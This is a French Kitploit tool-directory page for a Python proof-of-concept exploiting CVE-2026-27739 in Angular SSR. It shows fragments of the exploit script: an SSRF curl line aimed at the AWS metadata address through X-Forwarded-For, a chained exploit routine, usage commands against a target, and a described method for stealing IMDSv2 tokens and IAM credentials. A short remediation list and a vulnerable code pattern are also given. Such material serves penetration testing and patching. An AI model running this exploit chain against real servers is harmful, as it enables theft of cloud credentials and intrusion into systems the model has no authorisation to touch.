Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2026-27739-POC — PoC Python exploitant CVE-2026-27739 dans Angular SSR : injection d'en-tête via pollution de prototype et chaînage SSRF vers AWS IMDS/GCP metadata pour le vol d'identifiants. | Kitploit
Outils/GitHubGitHub/mr-redoo7/cve-2026-27739-poc
Analyse des VulnérabilitésExploitationExploitation d'Applications WebCollecte d'InformationsSécurité WebTests d'IntrusionSécurité des API
GitHubmr-redoo7/cve-2026-27739-poc

CVE-2026-27739-POC

PoC Python exploitant CVE-2026-27739 dans Angular SSR : injection d'en-tête via pollution de prototype et chaînage SSRF vers AWS IMDS/GCP metadata pour le vol d'identifiants.

Voir le dépôt
il y a 5 moisPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

-CVE-2026-27739-poc

curl -H "X-Forwarded-For: http://169.254.169.254/latest/meta-data/" {self.target}

2. Injection d'en-tête via pollution de prototype (CVSS : 7.5)

Description : Angular SSR traite des paramètres de requête non sécurisés affectant la chaîne de prototypes Impact : Manipulation des en-têtes de requête, chaînage SSRF potentiel

Remédiation

  1. Supprimer/désactiver le traitement des en-têtes X-Forwarded-* ou whitelister les proxys connus
  2. Mettre en place une validation stricte des URL avant les opérations sujettes au SSRF
  3. Utiliser express-validator ou équivalent pour la sanitisation des en-têtes
  4. Désactiver les endpoints de métadonnées AWS/GCP ou utiliser IMDSv2 avec hop limit """ print(report) with open("angular_ssr_exploit_report.txt", "w") as f: f.write(report)

def main(): parser = argparse.ArgumentParser(description="Angular SSR SSRF & Header Injection Exploit") parser.add_argument("target", help="Target Angular SSR application URL") parser.add_argument("--no-ssl-verify", action="store_true", help="Disable SSL verification")

root@kitploit:~
args = parser.parse_args()

exploit = AngularSSRExploit(args.target, ssl_verify=not args.no_ssl_verify)

print(f"[+] Targeting: {args.target}")
print(f"[+] SSL Verify: {'Disabled' if args.no_ssl_verify else 'Enabled'}")

# Execute exploit chain
exploit.test_header_injection()
exploit.exploit_ssrf_chain()
exploit.extract_sensitive_data()
exploit.generate_report()

if name == "main": main() Utilisation bash

Basic SSRF test

python3 angular_ssr_exploit.py https://target.com

With SSL bypass for self-signed certs

python3 angular_ssr_exploit.py https://target.com --no-ssl-verify Fonctionnement Test d'injection d'en-tête : Envoie des payloads de pollution de prototype et des en-têtes forwarded non sécurisés qu'Angular SSR pourrait traiter de manière non sécurisée Chaîne SSRF : Teste l'accès à AWS IMDS, aux métadonnées GCP, aux services localhost via X-Forwarded-For/X-Original-URL Extraction de jeton IMDSv2 : Chaîne le SSRF pour voler les jetons de métadonnées AWS puis les identifiants IAM Rapport automatisé : Génère un rapport de pentest noté CVSS avec les PoC Détails techniques Cause racine : Les applications Angular Universal SSR transmettent souvent req.headers directement aux API internes sans sanitisation :

javascript

// Vulnerable Angular SSR pattern app.get('*', (req, res) => { const url = req.headers['x-original-url'] || req.originalUrl; // SSRF internalFetch(url, { headers: req.headers }); // Header injection });

Télécharger l’outil